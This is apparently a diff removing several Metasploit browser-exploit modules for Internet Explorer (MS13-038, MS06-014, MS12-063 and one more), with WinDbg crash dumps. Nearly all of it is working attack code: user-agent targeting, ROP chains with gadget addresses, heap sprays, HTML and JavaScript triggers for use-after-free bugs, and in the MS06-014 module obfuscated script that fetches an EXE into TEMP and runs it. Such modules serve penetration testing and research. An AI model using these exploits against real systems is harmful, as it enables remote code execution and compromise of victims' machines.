],
'Privileged' => false,
'DisclosureDate' => "Dec 27 2012",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '5.2'
os_name = 'Windows Server 2003'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
else
# OS not supported
return nil
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end
return nil
end
def junk(n=4)
return rand_text_alpha(n).unpack("V")[0].to_i
end
def nop
return make_nops(4).unpack("V")[0].to_i
end
def get_payload(t, cli)
code = payload.encoded
# No rop. Just return the payload.
return code if t['Rop'].nil?
# Make post code execution more stable
code << rand_text_alpha(12000)
msvcrt_align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
java_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
rop_payload = ''
case t['Rop']
when :msvcrt
case t.name
when 'IE 8 on Windows XP SP3'
rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
when 'IE 8 on Windows Server 2003'
rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
end
else
rop_payload = generate_rop_payload('java', java_align + code)
end
rop_payload
end
def load_exploit_html(my_target, cli)
case my_target['Rop']
when :msvcrt
case my_target.name
when 'IE 8 on Windows XP SP3'
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
when 'IE 8 on Windows Server 2003'
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
end
else
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
end
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
html = %Q|<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
<script>
#{js_mstime_malloc}
function helloWorld() {
e_form = document.getElementById("formelm");
e_div = document.getElementById("divelm");
for(i =0; i < 20; i++) {
document.createElement('button');
}
e_div.appendChild(document.createElement('button'));
e_div.firstChild.applyElement(e_form);
e_div.innerHTML = "";
e_div.appendChild(document.createElement('body'));
CollectGarbage();
p = unescape("#{padding}");
for (i=0; i < 3; i++) {
p += unescape("#{padding}");
}
p += unescape("#{js_payload}");
fo = unescape("#{align_esp}");
for (i=0; i < 55; i++) {
if (i == 54) { fo += unescape("#{xchg_esp}"); }
else { fo += unescape("#{align_esp}"); }
}
fo += p;
mstime_malloc({shellcode:fo, heapBlockSize:0x58, objId:"myanim"});
}
</script>
</head>
<body onload="eval(helloWorld())">
<t:ANIMATECOLOR id="myanim"/>
<div id="divelm"></div>
<form id="formelm">
</form>
</body>
</html>
|
return html
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
uri = request.uri
print_status("Requesting: #{uri}")
my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
html = load_exploit_html(my_target, cli)
html = html.gsub(/^ {4}/, '')
print_status("Sending HTML...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
=begin
(87c.f40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!CMarkup::OnLoadStatusDone+0x504:
637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????
0:008> k
ChildEBP RetAddr
020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504
020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47
020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f
020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12
020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb
020bfd78 7e418734 mshtml!GlobalWndProc+0x183
020bfda4 7e418816 USER32!InternalCallWinProc+0x28
020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150
020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306
020bfe7c 01252ec9 USER32!DispatchMessageW+0xf
020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461
020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1
020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab
020bffec 00000000 kernel32!BaseThreadStart+0x37
0:008> r
eax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
mshtml!CMarkup::OnLoadStatusDone+0x504:
637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????
=end


@ -1,232 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "8.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::Match::WINDOWS,
:rank => GoodRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. A
use-after-free condition occurs when a CGenericElement object is freed, but a
reference is kept on the Document and used again during rendering, an invalid
memory that's controllable is used, and allows arbitrary code execution under the
context of the user.
Please note: This vulnerability has been exploited in the wild on 2013 May, in
the compromise of the Department of Labor (DoL) Website.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown',
'EMH',
'juan vazquez', #RCA
'sinn3r' #RCA
],
'References' =>
[
[ 'CVE', '2013-1347' ],
[ 'OSVDB', '92993' ],
[ 'MSB', 'MS13-038' ],
[ 'US-CERT-VU', '237655' ],
[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]
],
'Privileged' => false,
'DisclosureDate' => "May 3 2013",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
end
def get_target(agent)
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '5.2'
os_name = 'Windows Server 2003'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
else
# OS not supported
return nil
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end
return nil
end
def get_payload(t, cli)
rop_payload = ''
# Extra junk in the end to make sure post code execution is stable.
p = payload.encoded
case t['Rop']
when :msvcrt
align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
rop_payload = ''
if t.name == 'IE 8 on Windows XP SP3'
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
elsif t.name == 'IE 8 on Windows Server 2003'
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
end
else
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code << p
code << rand_text_alpha(12000)
rop_payload = generate_rop_payload('java', code)
end
return rop_payload
end
def load_exploit_html(my_target, cli)
case my_target['Rop']
when :msvcrt
case my_target.name
when 'IE 8 on Windows XP SP3'
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
when 'IE 8 on Windows Server 2003'
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
end
else
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
end
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
html = %Q|
<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
<script>
#{js_mstime_malloc}
function helloWorld()
{
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");
magenta = unescape("#{align_esp}");
for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
else { magenta += unescape("#{align_esp}"); }
}
magenta += sparkle;
document.body.contentEditable="true";
f0 = document.createElement('span');
f1 = document.createElement('span');
f2 = document.createElement('span');
document.body.appendChild(f0);
document.body.appendChild(f1);
document.body.appendChild(f2);
for (i=0; i < 20; i++) { document.createElement("img"); }
f2.appendChild(document.createElement('datalist'));
f1.appendChild(document.createElement('span'));
CollectGarbage();
f1.appendChild(document.createElement('table'));
try { f0.offsetParent=null;}
catch(e) { }
f2.innerHTML = "";
f1.innerHTML = "";
f0.appendChild(document.createElement('hr'));
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
}
</script>
</head>
<body onload="eval(helloWorld());">
<t:ANIMATECOLOR id="myanim"/>
</body>
</html>
|
return html
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
uri = request.uri
print_status("Requesting: #{uri}")
my_target = get_target(agent)
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
html = load_exploit_html(my_target, cli)
html = html.gsub(/^ {4}/, '')
print_status("Sending HTML...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end


@ -1,263 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Seh
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
# In badly misconfigured situations, IE7 and 8 could be vulnerable to
# this, but by default they throw an ugly popup that stops all script
# execution until the user deals with it and aborts everything if they
# click "no". Not worth the risk of being unable to try more recent
# exploits. Make sure service packs on top of 6.0 are considered less
# than the max by setting to 6.1 (which doesn't really exist).
:ua_maxver => "6.1",
:javascript => true,
:os_name => OperatingSystems::Match::WINDOWS,
:method => [ 'CreateObject', 'GetObject' ],
:classid =>
[
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{BD96C556-65A3-11D0-983A-00C04FC29E30}',
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
'{639F725F-1B2D-4831-A9FD-874847682010}',
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
'{0006F033-0000-0000-C000-000000000046}',
'{0006F03A-0000-0000-C000-000000000046}',
],
#:rank => ExcellentRanking # reliable exe writer
})
def initialize(info = {})
super(update_info(info,
'Name' => 'MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution',
'Description' => %q{
This module exploits a generic code execution vulnerability in Internet
Explorer by abusing vulnerable ActiveX objects.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hdm',
],
'References' =>
[
# MDAC
[ 'MSB', 'MS06-014' ],
[ 'CVE', '2006-0003' ],
[ 'OSVDB', '24517' ],
# WMI Object Broker
[ 'MSB', 'MS06-073' ],
[ 'CVE', '2006-4704' ],
[ 'OSVDB', '30155' ],
],
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
# Patched
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
# Found in mpack
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],
# Patched
[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],
# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],
[ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],
# Visual Studio components, not marked as safe
[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],
#
# The controls below can launch the "installing component" dialogs...
#
# Not marked as safe
[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],
# Not marked as safe
[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],
# Found exploitable in the wild (no details)
[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 11 2006'))
end
def on_request_uri(cli, request)
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
data = generate_payload_exe({ :code => p.encoded })
print_status("Sending EXE payload")
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
# Build out the HTML response page
var_html = rand_text_alpha(rand(30)+2)
var_func_exploit = rand_text_alpha(rand(30)+2);
var_func_go = rand_text_alpha(rand(30)+2);
var_func_createo = rand_text_alpha(rand(30)+2);
var_exe_name = rand_text_alpha(rand(30)+2);
var_objects = ''
# Build the object list based on target selection
if (target.name == 'Automatic')
targets.each do |t|
next if not t['CLSID']
var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
end
else
var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
end
content = %Q^
<html><head><title></title>
<script language="javascript">
function #{var_func_createo}( o , n ) {
var r = null;
try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}
if (! r) {
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}
}
if (! r) {
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
}
if (! r) {
try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
}
if (! r) {
try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
}
if (! r) {
try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
}
return( r );
}
function #{var_func_go}( a ) {
var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" );
var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" );
var e = s.Environment( "P" + "ro" + "ce" + "ss" );
var url = document.location + '/p' + 'ay' + 'lo' + 'ad';
var xml = null;
var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if (! xml) {
return(0);
}
xml.open("GET", url, false);
xml.send(null);
dat = xml.responseBody;
o.Type = 1 ;
o.Mode = 3 ;
o.Open ( ) ;
o.Write ( dat ) ;
o.SaveToFile ( bin, 2) ;
s.Run ( bin , 0 );
}
function #{var_func_exploit}( ) {
var i = 0;
var t = new Array( #{var_objects} null );
while (t[i]) {
var a = null;
if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}
if (a) {
try {
var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ;
if (b) {
#{var_func_go}( a ) ;
return(0) ;
}
} catch(e){
}
}
i++;
}
}
</script>
</head>
<body onload='#{var_func_exploit}()'>
#{var_html}
</body>
</html>
^
content = Rex::Text.randomize_space(content)
print_status("Sending exploit HTML...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end


@ -1,389 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "7.0",
:ua_maxver => "9.0",
:javascript => true,
:rank => GoodRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When
rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner,
but the same memory is reused again later in the CMshtmlEd::Exec() function, leading
to a use-after-free condition.
Please note that this vulnerability has been exploited in the wild since Sep 14 2012.
Also note that presently, this module has some target dependencies for the ROP chain to be
valid. For WinXP SP3 with IE8, msvcrt must be present (as it is by default).
For Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or below must be installed (which
is often the case).
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # via ZDI
'eromang', # First public discovery
'binjo',
'sinn3r', # Metasploit
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'CVE', '2012-4969' ],
[ 'OSVDB', '85532' ],
[ 'MSB', 'MS12-063' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2757760' ],
[ 'URL', 'http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/' ]
],
'Payload' =>
{
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Random' => false } ],
[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ],
[ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fc', 'Random' => true } ]
],
'Privileged' => false,
'DisclosureDate' => "Sep 14 2012", # When it was spotted in the wild by eromang
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
vprint_status("Target selected as: #{t.name}")
return t
end
end
return nil
end
def junk(n=4)
return rand_text_alpha(n).unpack("V")[0].to_i
end
def nop
return make_nops(4).unpack("V")[0].to_i
end
def get_payload(t, cli)
code = payload.encoded
# No rop. Just return the payload.
return code if t['Rop'].nil?
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
exec_size = code.length
stack_pivot = [
0x77c4e393, # RETN
0x77c4e392, # POP EAX # RETN
0x77c15ed5, # XCHG EAX, ESP # RETN
].pack("V*")
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
else
print_status("Using JRE ROP")
exec_size = 0xffffffff - code.length + 1
if t['Random']
stack_pivot = [
0x0c0c0c0c, # 0c0c0c08
0x7c347f98, # RETN
0x7c347f97, # POP EDX # RETN
0x7c348b05 # XCHG EAX, ESP # RET
].pack("V*")
else
stack_pivot = [
0x7c347f98, # RETN
0x7c347f97, # POP EDX # RETN
0x7c348b05 # XCHG EAX, ESP # RET
].pack("V*")
end
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
end
return rop_payload
end
# Spray published by corelanc0d3r
# Exploit writing tutorial part 11 : Heap Spraying Demystified
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
def get_random_spray(t, js_code, js_nops)
randnop = rand_text_alpha(rand(100) + 1)
spray = <<-JS
function randomblock(blocksize)
{
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock;
}
function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}
var heap_obj = new heapLib.ie(0x10000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset_length = #{t['Offset']};
for (var i=0; i < 0x1000; i++) {
var padding = unescape(tounescape(randomblock(0x1000)));
while (padding.length < 0x1000) padding+= padding;
var junk_offset = padding.substring(0, offset_length);
var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}
JS
return spray
end
def get_spray(t, js_code, js_nops)
randnop = rand_text_alpha(rand(100) + 1)
js = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
JS
end
def load_html1(cli, my_target)
p = get_payload(my_target, cli)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
if my_target['Random']
js = get_random_spray(my_target, js_code, js_r_nops)
else
js = get_spray(my_target, js_code, js_nops)
end
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
html = %Q|
<html>
<body>
<script>
var arrr = new Array();
arrr[0] = window.document.createElement("img");
arrr[0]["src"] = "#{Rex::Text.rand_text_alpha(1)}";
</script>
<iframe src="#{this_resource}/#{@html2_name}"></iframe>
<script>
#{js}
</script>
</body>
</html>
|
return html
end
def load_html2
html = %Q|
<HTML>
<script>
function funcB() {
document.execCommand("selectAll");
};
function funcA() {
document.write("#{Rex::Text.rand_text_alpha(1)}");
parent.arrr[0].src = "YMjf\\u0c08\\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";
}
</script>
<body onload='funcB();' onselect='funcA()'>
<div contenteditable='true'>
a
</div>
</body>
</HTML>
|
return html
end
def this_resource
r = get_resource
return ( r == '/') ? '' : r
end
def on_request_uri(cli, request)
uri = request.uri
agent = request.headers['User-Agent']
my_target = get_target(agent)
vprint_status("Requesting: #{uri}")
print_status(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported, sending a 404: #{agent.to_s}")
send_not_found(cli)
return
end
if uri =~ /#{@html2_name}/
print_status("Loading #{@html2_name}")
html = load_html2
elsif uri =~ /#{@html1_name}/
print_status("Loading #{@html1_name}")
html = load_html1(cli, my_target)
elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
print_status("Redirecting to #{@html1_name}")
send_redirect(cli, "#{this_resource}/#{@html1_name}")
return
else
send_not_found(cli)
return
end
html = html.gsub(/^ {4}/, '')
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def exploit
@html1_name = "#{Rex::Text.rand_text_alpha(5)}.html"
@html2_name = "#{Rex::Text.rand_text_alpha(6)}.html"
super
end
end
=begin
0:008> r
eax=00000000 ebx=0000001f ecx=002376c8 edx=0000000d esi=00000000 edi=0c0c0c08
eip=637d464e esp=020bbe80 ebp=020bbe8c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!CMshtmlEd::Exec+0x134:
637d464e 8b07 mov eax,dword ptr [edi] ds:0023:0c0c0c08=????????
0:008> u
mshtml!CMshtmlEd::Exec+0x134:
637d464e 8b07 mov eax,dword ptr [edi]
637d4650 57 push edi
637d4651 ff5008 call dword ptr [eax+8]
0:008> k
ChildEBP RetAddr
020bbe8c 637d4387 mshtml!CMshtmlEd::Exec+0x134
020bbebc 637be2fc mshtml!CEditRouter::ExecEditCommand+0xd6
020bc278 638afda7 mshtml!CDoc::ExecHelper+0x3c91
020bc298 638ee2a9 mshtml!CDocument::Exec+0x24
020bc2c0 638b167b mshtml!CBase::execCommand+0x50
020bc2f8 638e7445 mshtml!CDocument::execCommand+0x93
020bc370 636430c9 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149
020bc3e4 63643595 mshtml!CBase::ContextInvokeEx+0x5d1
020bc410 63643832 mshtml!CBase::InvokeEx+0x25
020bc460 635e1cdc mshtml!DispatchInvokeCollection+0x14b
020bc4a8 63642f30 mshtml!CDocument::InvokeEx+0xf1
020bc4d0 63642eec mshtml!CBase::VersionedInvokeEx+0x20
020bc520 633a6d37 mshtml!PlainInvokeEx+0xea
020bc560 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
020bc59c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
020bc65c 633a9f3c jscript!InvokeDispatchEx+0x98
